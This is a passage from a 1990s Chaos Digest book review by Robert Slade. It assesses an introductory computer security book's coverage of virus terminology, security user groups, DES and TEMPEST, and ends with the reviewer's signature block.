(anyone else ever heard this term before?). "Crabs" are not, as I had thought, prank programs seen on Mac and Atari computers, but a generic term for programs that "attack" the screen display. In the appendix on "Security User Groups", the Computer Virus Industry Association (CVIA) is mentioned, while the Computer Antivirus Research Organization (CARO) and EICAR are not. The International Computer Security Association is not mentioned with the groups, but makes the book list. ("Electronic Groups" mentions Usenet, and a rather aging list of newsgroups, but doesn't mention the Internet or any of the "listservs".) Other aspects of the book are excellent. The coverage of DES, for example, does not shy away from dealing with the controversy surrounding the standard, and is very careful in reporting the research that has been done. The chapter on TEMPEST is interesting. It becomes intriguing when TEMPEST is used as a springboard to discuss the hypothesized health risks of VDTs and states that TEMPEST may be used to sheild the user (even though it goes on to say that TEMPEST sometimes involves false "emitters" within the system). In sum, the book may be a good starting point for beginners who have to start to deal with computer security at a basic level. While there are shortcomings in the material within the book itself, there are also sufficient resources listed in the appendices to provide a guide for further study by the user. =================== Vancouver ROBERTS@decus.ca | "Power users think Institute for Robert_Slade@sfu.ca | 'Your PC is now Research into rslade@cue.bc.ca | Stoned' is part of User p1@CyberStore.ca | the DOS copyright Security Canada V7K 2G6 | line." R. Murnane ------------------------------ End of Chaos Digest #1.63 ************************************